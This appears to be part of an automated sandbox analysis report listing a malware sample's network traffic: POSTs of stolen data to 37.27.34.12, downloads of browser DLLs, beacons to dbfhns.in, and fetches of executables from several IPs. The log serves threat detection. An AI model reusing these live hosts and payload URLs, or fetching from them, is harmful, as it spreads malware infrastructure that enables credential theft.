                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 5329Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 1081Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 113601Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://spqqefesecvvfpt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxgcikcstvjhw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://deiljvysjqajyam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tgeabjhcrwocia.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfipxhiwprpsvl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdyttvvsjifyxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://faqldvcxoayalcyp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nspuoowkrfsuk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gcvwrsnytusejtdk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jebcasiwwjgorbsq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
                    Source: global trafficHTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bshlmattfttfdb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bngikvknmtdpor.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amkihwobrgvem.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdtrshdmdsajiin.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://depvhlbmmte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://barvntqgmwgcruw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmmajutpfcykk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrlquvadpwx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmlmhdjgxcsr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhyltqofxhpe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxoumlltphj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etetxpvheghmlur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://spdxbqopubx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxinixbdcjjccvdo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://euirtythbemo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://btndjessgdxlt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nfymgppnbopwxnwd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ckgltynaavllsolq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbtkypdfbiu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://haglmiwlgvefe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dnvpkenpnlmca.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvgxhyimdjdqth.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: dbfhns.in
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0CCC60 PR_Recv,12_2_6D0CCC60
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
                    Source: global trafficHTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
                    Source: global trafficHTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
                    Source: global trafficHTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
                    Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: dbfhns.in
                    Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                    Source: global trafficDNS traffic detected: DNS query: whispedwoodmoodsksl.shop
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ed Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
